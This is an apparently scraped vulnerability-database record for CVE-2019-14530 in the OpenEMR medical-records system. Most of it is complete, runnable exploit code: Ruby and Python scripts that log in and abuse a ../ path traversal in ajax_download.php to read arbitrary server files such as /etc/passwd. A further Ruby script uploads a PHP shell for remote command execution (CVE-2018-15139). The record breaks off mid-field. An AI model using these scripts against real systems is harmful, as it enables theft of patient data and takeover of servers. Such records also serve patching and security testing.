OpenEMR 5.0.1.7 Path Traversal

2021-07-05T00:00:00

Description

{"id": "PACKETSTORM:163375", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "OpenEMR 5.0.1.7 Path Traversal", "description": "", "published": "2021-07-05T00:00:00", "modified": "2021-07-05T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html", "reporter": "Alexandre Zanni", "references": [], "cvelist": ["CVE-2019-14530"], "immutableFields": [], "lastseen": "2021-07-05T17:16:09", "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:CC8965D5-97BC-4618-BABB-A087A2406B74"]}, {"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037", "EDB-ID:50087", "EDB-ID:50122"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}], "rev": 4}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:CC8965D5-97BC-4618-BABB-A087A2406B74"]}, {"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037", "EDB-ID:50087", "EDB-ID:50122"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-14530", "epss": "0.947480000", "percentile": "0.987590000", "modified": "2023-03-17"}], "vulnersScore": -0.4}, "_state": {"dependencies": 1678920471, "score": 1698842854, "epss": 1679098904}, "_internal": {"score_hash": "d68857929af38025f7f3b45d6da0f57a"}, "sourceHref": "https://packetstormsecurity.com/files/download/163375/openemr5017fn-traversal.txt", "sourceData": "`# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530 \n# Date: 2021-06-24 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml \n# Version: < 5.0.2 (it means up to 5.0.1.7) \n# Tested on: OpenEMR Version 5.0.1 \n# References: https://www.exploit-db.com/exploits/50037 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Patch: https://github.com/openemr/openemr/pull/2592/files \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the file to be read \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass \n#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef exploit(root_url, filename, http) \nvuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\" \n \nhttp.get(vuln_url).body.to_s \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs exploit(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n"}

{"githubexploit": [{"lastseen": "2022-02-10T21:28:35", "description": "# OpenEMR CVE-2019-14530 exploit\n\n> OpenEMR < 5.0.2 - (Authentic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T08:59:57", "type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-08T19:35:09", "id": "BF123FAC-E699-5CD0-8741-C391F80816EA", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-10T21:12:03", "description": "# CVE-2019-14530\n\nPath traversal and DoS vulnerability in OpenEM...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T01:33:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-01-09T21:00:36", "id": "9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "exploitdb": [{"lastseen": "2023-12-03T15:44:44", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "EDB-ID:50087", "href": "https://www.exploit-db.com/exploits/50087", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\r\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\r\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\r\n# Date: 2021-06-24\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\r\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\r\n# Version: < 5.0.2 (it means up to 5.0.1.7)\r\n# Tested on: OpenEMR Version 5.0.1\r\n# References: https://www.exploit-db.com/exploits/50037\r\n# CVE: CVE-2019-14530\r\n# CWE: CWE-22\r\n# Patch: https://github.com/openemr/openemr/pull/2592/files\r\n\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'pathname'\r\nrequire 'httpx'\r\nrequire 'docopt'\r\n\r\ndoc = <<~DOCOPT\r\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\r\n\r\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\r\n\r\n Usage:\r\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\r\n #{__FILE__} -h | --help\r\n\r\n Options:\r\n <url> Root URL (base path) including HTTP scheme, port and root folder\r\n <filename> Filename of the file to be read\r\n <username> Username of the admin\r\n <password> Password of the admin\r\n --debug Display arguments\r\n -h, --help Show this screen\r\n\r\n Examples:\r\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\r\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass\r\nDOCOPT\r\n\r\ndef login(root_url, user, pass, http)\r\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\r\n params = {\r\n 'new_login_session_management' => '1',\r\n 'authProvider' => 'Default',\r\n 'authUser' => user,\r\n 'clearPass' => pass,\r\n 'languageChoice' => '1'\r\n }\r\n\r\n http.post(vuln_url, form: params).body.to_s\r\nend\r\n\r\ndef exploit(root_url, filename, http)\r\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\"\r\n\r\n http.get(vuln_url).body.to_s\r\nend\r\n\r\nbegin\r\n args = Docopt.docopt(doc)\r\n pp args if args['--debug']\r\n\r\n if args['exploit']\r\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\r\n login(args['<url>'], args['<username>'], args['<password>'], http)\r\n puts exploit(args['<url>'], args['<filename>'], http)\r\n end\r\nrescue Docopt::Exit => e\r\n puts e.message\r\nend", "sourceHref": "https://www.exploit-db.com/raw/50087", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:44:49", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-14530", "CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "EDB-ID:50037", "href": "https://www.exploit-db.com/exploits/50037", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\r\n# Date 16.06.2021\r\n# Exploit Author: Ron Jost (Hacker5preme)\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\r\n# Version: All versions prior to 5.0.2\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2019-14530\r\n# CWE: CWE-22\r\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\r\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\r\n\r\n'''\r\nDescription:\r\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\r\nAn authenticated attacker can download any file (that is readable by the user www-data)\r\nfrom server storage. If the requested file is writable for the www-data user and the directory\r\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\r\n'''\r\n\r\n\r\n'''\r\nBanner:\r\n'''\r\nbanner = \"\"\" \r\n \r\n \r\n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \r\n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \r\n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\r\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\r\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \r\n \r\n by Hacker5preme\r\n \r\n\"\"\"\r\nprint(banner)\r\n\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport requests\r\nimport argparse\r\n\r\n\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\r\nmy_parser.add_argument('-T', '--IP', type=str)\r\nmy_parser.add_argument('-P', '--PORT', type=str)\r\nmy_parser.add_argument('-U', '--PATH', type=str)\r\nmy_parser.add_argument('-u', '--USERNAME', type=str)\r\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.IP\r\ntarget_port = args.PORT\r\nopenemr_path = args.PATH\r\nusername = args.USERNAME\r\npassword = args.PASSWORD\r\nprint('')\r\nFilepath = input('[+] Filepath: ')\r\n\r\n\r\n'''\r\nAuthentication:\r\n'''\r\nsession = requests.Session()\r\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\r\n\r\n# Header:\r\nheader = {\r\n 'Host': target_ip,\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': 'http://' + target_ip,\r\n 'Connection': 'close',\r\n 'Upgrade-Insecure-Requests': '1'\r\n}\r\n\r\n# Body:\r\nbody = {\r\n 'new_login_session_management': '1',\r\n 'authProvider': 'Default',\r\n 'authUser': username,\r\n 'clearPass': password,\r\n 'languageChoice': '1'\r\n}\r\n\r\n# Authenticate:\r\nprint('')\r\nauth = session.post(auth_url, headers=header, data=body)\r\nif 'error=1&site=' in auth.text:\r\n print('[-] Authentication failed')\r\n exit()\r\nelse:\r\n print('[+] Authentication successfull: ' + str(auth))\r\n\r\n\r\n'''\r\nPath Traversal:\r\n'''\r\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\r\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\r\nurl_exploit = url_static + url_dynamic + Filepath\r\nprint('')\r\nprint('[+] Constructed malicious URL: ')\r\n\r\n# Headers:\r\nheader = {\r\n 'Host': target_ip,\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Connection': 'close',\r\n 'Upgrade-Insecure-Requests': '1'\r\n}\r\n\r\n# Exploit:\r\nprint('')\r\nprint('[+] Contents of ' + Filepath + ':')\r\nprint('')\r\ngetfile = session.get(url_exploit, headers = header)\r\nprint(getfile.text)", "sourceHref": "https://www.exploit-db.com/raw/50037", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:44:40", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\r\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\r\n# Date: 2021-07-05\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\r\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\r\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\r\n# Tested on: OpenEMR Version 5.0.0.8\r\n# References: https://www.exploit-db.com/exploits/49998\r\n# CVE: CVE-2018-15139\r\n# CWE: CWE-434\r\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\r\n\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'pathname'\r\nrequire 'httpx'\r\nrequire 'http/form_data'\r\nrequire 'docopt'\r\n\r\ndoc = <<~DOCOPT\r\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\r\n\r\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\r\n\r\n Usage:\r\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\r\n #{__FILE__} -h | --help\r\n\r\n Options:\r\n <url> Root URL (base path) including HTTP scheme, port and root folder\r\n <filename> Filename of the shell to be uploaded\r\n <username> Username of the admin\r\n <password> Password of the admin\r\n --debug Display arguments\r\n -h, --help Show this screen\r\n\r\n Examples:\r\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\r\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\r\nDOCOPT\r\n\r\ndef login(root_url, user, pass, http)\r\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\r\n params = {\r\n 'new_login_session_management' => '1',\r\n 'authProvider' => 'Default',\r\n 'authUser' => user,\r\n 'clearPass' => pass,\r\n 'languageChoice' => '1'\r\n }\r\n\r\n http.post(vuln_url, form: params).body.to_s\r\nend\r\n\r\ndef upload(root_url, filepath, http)\r\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\r\n pn = Pathname.new(filepath)\r\n\r\n params = {\r\n form_image: {\r\n content_type: 'application/x-php',\r\n filename: pn.basename.to_s,\r\n body: pn\r\n },\r\n bn_save: 'Save'\r\n }\r\n\r\n res = http.post(vuln_url, form: params)\r\n\r\n return '[-] File not upload' unless (200..299).include?(res.status)\r\n\r\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\r\nend\r\n\r\nbegin\r\n args = Docopt.docopt(doc)\r\n pp args if args['--debug']\r\n\r\n if args['exploit']\r\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\r\n login(args['<url>'], args['<username>'], args['<password>'], http)\r\n puts upload(args['<url>'], args['<filename>'], http)\r\n end\r\nrescue Docopt::Exit => e\r\n puts e.message\r\nend", "sourceHref": "https://www.exploit-db.com/raw/50122", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:08:55", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:42pm UTC reported:\n\n * Title: OpenEMR < 5.0.2 \u2013 (Authenticated) Path Traversal \u2013 Local File Disclosure \n\n * Vulnerable version: < 5.0.2 (it means up to 5.0.1.7) \n\n * Patch: <https://github.com/openemr/openemr/pull/2592/files> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2019-14530", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2020-06-05T00:00:00", "id": "AKB:CC8965D5-97BC-4618-BABB-A087A2406B74", "href": "https://attackerkb.com/topics/M8KwhNKjmJ/cve-2019-14530", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-06-22T19:45:45", "description": "", "cvss3": {}, "published": "2021-06-18T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.7 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-18T00:00:00", "id": "PACKETSTORM:163215", "href": "https://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) \n# Date 16.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip \n# Version: All versions prior to 5.0.2 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md \n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf \n \n''' \nDescription: \nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. \nAn authenticated attacker can download any file (that is readable by the user www-data) \nfrom server storage. If the requested file is writable for the www-data user and the directory \n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. \n''' \n \n \n''' \nBanner: \n''' \nbanner = \"\"\" \n \n \n______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n/ ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | | \n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| | \n\\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \nby Hacker5preme \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \nprint('') \nFilepath = input('[+] Filepath: ') \n \n \n''' \nAuthentication: \n''' \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \n \n# Header: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Body: \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authenticate: \nprint('') \nauth = session.post(auth_url, headers=header, data=body) \nif 'error=1&site=' in auth.text: \nprint('[-] Authentication failed') \nexit() \nelse: \nprint('[+] Authentication successfull: ' + str(auth)) \n \n \n''' \nPath Traversal: \n''' \nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path \nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..' \nurl_exploit = url_static + url_dynamic + Filepath \nprint('') \nprint('[+] Constructed malicious URL: ') \n \n# Headers: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Exploit: \nprint('') \nprint('[+] Contents of ' + Filepath + ':') \nprint('') \ngetfile = session.get(url_exploit, headers = header) \nprint(getfile.text) \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": 